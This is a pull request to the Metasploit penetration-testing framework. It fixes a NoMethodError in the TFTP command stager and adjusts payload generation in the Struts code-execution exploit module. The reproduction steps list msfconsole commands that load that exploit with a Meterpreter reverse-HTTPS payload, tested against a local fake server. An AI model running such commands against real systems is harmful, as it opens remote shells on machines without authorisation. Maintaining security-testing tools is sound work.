### PR TITLE
Fix #4156, cmdstager NoMethodError undefined method `stop'

### DIFF
--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -38,7 +38,6 @@ class CmdStagerTFTP < CmdStagerBase
   end
 
   def teardown(mod = nil)
-    puts self.tftp.inspect
     self.tftp.stop
   end
 

--- a/lib/rex/exploitation/cmdstager/tftp.rb
+++ b/lib/rex/exploitation/cmdstager/tftp.rb
@@ -31,14 +31,15 @@ class CmdStagerTFTP < CmdStagerBase
   end
 
   def setup(mod)
-    tftp = Rex::Proto::TFTP::Server.new
-    tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
-    tftp.start
-    mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
+    self.tftp = Rex::Proto::TFTP::Server.new
+    self.tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
+    self.tftp.start
+    mod.add_socket(self.tftp) # Hating myself for doing it... but it's just a first demo
   end
 
   def teardown(mod = nil)
-    tftp.stop
+    puts self.tftp.inspect
+    self.tftp.stop
   end
 
   #

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -91,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def windows_stager
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
     execute_cmdstager({ :temp => '.' })
-    @payload_exe = payload_exe
+    @payload_exe = generate_payload_exe
 
     print_status("Attempting to execute the payload...")
     execute_command(@payload_exe)


### PR DESCRIPTION
This fixes: https://github.com/rapid7/metasploit-framework/issues/4156

To verify the bug, you can do:
- [x] `ruby -run -e httpd . -p 8181` and use this as your fake server
- [x] Start msfconsole
- [x] `use exploit/multi/http/struts_code_exec`
- [x] `set rhost [target]`
- [x] `set lhost [ip]`
- [x] `set rport 8181`
- [x] `set PAYLOAD windows/meterpreter/reverse_https`
- [x] `set URI /`
- [x] `exploit`
- [x] You should see "NoMethodError undefined method `stop' for nil:NilClass"

And then:
- [x] Apply the patch, repeat the same steps. You should no longer see the error.
